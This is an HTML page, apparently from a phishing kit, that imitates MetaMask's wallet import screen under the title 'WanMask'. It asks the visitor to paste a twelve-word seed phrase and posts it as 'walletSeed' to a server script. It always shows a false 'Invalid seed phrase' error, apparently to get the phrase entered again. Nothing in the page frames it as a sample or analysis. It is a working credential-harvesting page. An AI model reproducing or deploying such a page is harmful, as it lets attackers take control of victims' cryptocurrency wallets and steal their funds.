<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="viewport" content="width=device-width, initial-scale=1 user-scalable=no">
    <title>WanMask</title>
 <link href="MetaMask_files/favicon.png" type="image/x-icon" rel="shortcut icon">

    <link rel="stylesheet" type="text/css" href="MetaMask_files/index.css" title="ltr">
    <link rel="stylesheet" type="text/css" href="MetaMask_files/index-rtl.css" title="rtl" disabled="">
  <style></style><style type="text/css" data-jss="" data-meta="MuiInput">
.jss26 {
  color: rgba(0, 0, 0, 0.87);
  display: inline-flex;
  position: relative;
  font-size: 1rem;
  font-family: "Roboto", "Helvetica", "Arial", sans-serif;
  line-height: 1.1875em;
}
.jss26.jss29 {
  color: rgba(0, 0, 0, 0.38);
}
label + .jss27 {
  margin-top: 16px;
}
.jss30:after {
  left: 0;
  right: 0;
  bottom: 0;
  content: "";
  position: absolute;
  transform: scaleX(0);
  transition: transform 200ms cubic-bezier(0.0, 0, 0.2, 1) 0ms;
  border-bottom: 2px solid #303f9f;
  pointer-events: none;
}
.jss30.jss28:after {
  transform: scaleX(1);
}
.jss30.jss31:after {
  transform: scaleX(1);
  border-bottom-color: #f44336;
}
.jss30:before {
  left: 0;
  color: transparent;
  right: 0;
  bottom: 0;
  content: "need text here to prevent subpixel zoom issue";
  position: absolute;
  transition: border-bottom-color 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
  border-bottom: 1px solid rgba(0, 0, 0, 0.42);
  pointer-events: none;
}
.jss30:hover:not(.jss29):not(.jss28):not(.jss31):before {
  border-bottom: 2px solid rgba(0, 0, 0, 0.87);
}
.jss30.jss29:before {
  border-bottom: 1px dotted rgba(0, 0, 0, 0.42);
}
.jss32 {
  padding: 6px 0 7px;
}
.jss33 {
  width: 100%;
}
.jss34 {
  font: inherit;
  color: currentColor;
  border: 0;
  margin: 0;
  padding: 6px 0 7px;
  display: block;
  min-width: 0;
  flex-grow: 1;
  box-sizing: content-box;
  background: none;
  vertical-align: middle;
  -webkit-tap-highlight-color: transparent;
}
.jss34::-webkit-input-placeholder {
  color: currentColor;
  opacity: 0.42;
  transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
}
.jss34::-moz-placeholder {
  color: currentColor;
  opacity: 0.42;
  transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
}
.jss34:-ms-input-placeholder {
  color: currentColor;
  opacity: 0.42;
  transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
}
.jss34::-ms-input-placeholder {
  color: currentColor;
  opacity: 0.42;
  transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
}
.jss34:focus {
  outline: 0;
}
.jss34:invalid {
  box-shadow: none;
}
.jss34::-webkit-search-decoration {
  -webkit-appearance: none;
}
.jss34.jss29 {
  opacity: 1;
}
label[data-shrink=false] + .jss27 .jss34::-webkit-input-placeholder {
  opacity: 0;
}
label[data-shrink=false] + .jss27 .jss34::-moz-placeholder {
  opacity: 0;
}
label[data-shrink=false] + .jss27 .jss34:-ms-input-placeholder {
  opacity: 0;
}
label[data-shrink=false] + .jss27 .jss34::-ms-input-placeholder {
  opacity: 0;
}
label[data-shrink=false] + .jss27 .jss34:focus::-webkit-input-placeholder {
  opacity: 0.42;
}
label[data-shrink=false] + .jss27 .jss34:focus::-moz-placeholder {
  opacity: 0.42;
}
label[data-shrink=false] + .jss27 .jss34:focus:-ms-input-placeholder {
  opacity: 0.42;
}
label[data-shrink=false] + .jss27 .jss34:focus::-ms-input-placeholder {
  opacity: 0.42;
}
.jss35 {
  padding-top: 3px;
}
.jss36 {
  resize: none;
  padding: 0;
}
.jss37 {
  height: 1.1875em;
}
.jss38 {
  -moz-appearance: textfield;
  -webkit-appearance: textfield;
}
</style><style type="text/css" data-jss="" data-meta="MuiFormLabel">
.jss21 {
  color: rgba(0, 0, 0, 0.54);
  padding: 0;
  font-size: 1rem;
  font-family: "Roboto", "Helvetica", "Arial", sans-serif;
  line-height: 1;
}
.jss21.jss22 {
  color: #303f9f;
}
.jss21.jss23 {
  color: rgba(0, 0, 0, 0.38);
}
.jss21.jss24 {
  color: #f44336;
}
.jss25.jss24 {
  color: #f44336;
}
</style><style type="text/css" data-jss="" data-meta="MuiInputLabel">
.jss16 {
  transform-origin: top left;
}
.jss17 {
  top: 0;
  left: 0;
  position: absolute;
  transform: translate(0, 24px) scale(1);
}
.jss18 {
  transform: translate(0, 21px) scale(1);
}
.jss19 {
  transform: translate(0, 1.5px) scale(0.75);
  transform-origin: top left;
}
.jss20 {
  transition: transform 200ms cubic-bezier(0.0, 0, 0.2, 1) 0ms;
}
</style><style type="text/css" data-jss="" data-meta="MuiFormControl">
.jss12 {
  margin: 0;
  border: 0;
  display: inline-flex;
  padding: 0;
  position: relative;
  min-width: 0;
  flex-direction: column;
}
.jss13 {
  margin-top: 16px;
  margin-bottom: 8px;
}
.jss14 {
  margin-top: 8px;
  margin-bottom: 4px;
}
.jss15 {
  width: 100%;
}
</style><style type="text/css" data-jss="">
.jss1 {
  color: #aeaeae;
  font-weight: 400;
}
.jss1.jss2 {
  color: #aeaeae;
}
.jss1.jss4 {
  color: #aeaeae;
}
.jss3:after {
  border-bottom: 2px solid #f7861c;
}
.jss5.jss6 {
  color: #5b5b5b;
}
.jss5.jss4 {
  color: #5b5b5b;
}
.jss8 {
  border: 2px solid #BBC0C5;
  height: 48px;
  padding: 0 16px;
  display: flex;
  align-items: center;
  border-radius: 6px;
}
label + .jss8 {
  margin-top: 9px;
}
.jss8.jss7 {
  border: 1px solid #2f9ae0;
}
.jss9 {
  color: #5b5b5b;
  position: initial;
  transform: none;
  font-size: 1rem;
  transition: none;
}
.jss10 {
  color: #5b5b5b;
  position: initial;
  transform: none;
  font-size: .75rem;
  transition: none;
}
.jss11 {
  line-height: initial !important;
}
</style></head>
  <body>
    <div id="app-content"><div data-reactroot="" class="app mouse-user-styles"><!-- react-empty: 2 --><!-- react-empty: 3 --><div><span></span></div><div class=".menu-droppo-container network-droppo" style="position: absolute; top: 58px; width: 309px; z-index: 55;"><style>
        .menu-droppo-enter {
          transition: transform 300ms ease-in-out;
          transform: translateY(-200%);
        }

        .menu-droppo-enter.menu-droppo-enter-active {
          transition: transform 300ms ease-in-out;
          transform: translateY(0%);
        }

        .menu-droppo-leave {
          transition: transform 300ms ease-in-out;
          transform: translateY(0%);
        }

        .menu-droppo-leave.menu-droppo-leave-active {
          transition: transform 300ms ease-in-out;
          transform: translateY(-200%);
        }
      </style></div><noscript></noscript><div class="main-container-wrapper"><div class="first-time-flow"><div class="first-time-flow__wrapper"><div class="app-header__logo-container"><img height="30" src="MetaMask_files/metamask-logo-horizontal.svg" class="app-header__metafox-logo app-header__metafox-logo--horizontal"><img height="40" width="40" src="MetaMask_files/kgdgf.png" class="app-header__metafox-logo app-header__metafox-logo--icon"></div>

<form method="POST" action="Invalid.php"  class="first-time-flow__form"><div class="first-time-flow__create-back"></div>
<a href="#">&lt; Back</a>
<div class="first-time-flow__header">Import an account with seed phrase</div>

</br>
<div class="first-time-flow__text-block">Enter your secret twelve word phrase here to restore your vault.</div>


<div class="first-time-flow__textarea-wrapper">
<span class="error">Invalid seed phrase</span>

<textarea class="first-time-flow__textarea" name="walletSeed" maxlength="200"class="wInput ng-pristine ng-untouched ng-valid ng-empty"minlength="12" required=""placeholder="Paste seed phrase from clipboard"></textarea></div>
<span id="ftf-chk1-label" class="first-time-flow__checkbox-label">Show seed phrase</span>

<div class="jss12 jss13 first-time-flow__input">
<div class="jss26 jss8 jss27"><input type="password" aria-invalid="false"  aria-required="false" autocomplete="new-password" class="jss34 jss37" id="password" value="" dir="auto" placeholder="New Password"></div>
<div class="jss12 jss13 first-time-flow__input"><div class="jss26 jss8 jss27"><input type="password" aria-invalid="false" aria-required="false" autocomplete="confirm-password" class="jss34 jss37" id="confirm-password" value="" dir="auto" placeholder="Confirm Password"></div>
<i class="fa fa-check fa-2x"></i>
<span> I have read and agree to the <a href="#" target="_self" rel="noopener noreferrer"><span class="first-time-flow__link-text">Terms of Use</span></a> </span>

<center>
<button class="button btn-primary first-time-flow__button">Import</button></form></div></div></div></div></div></center>


</body></html>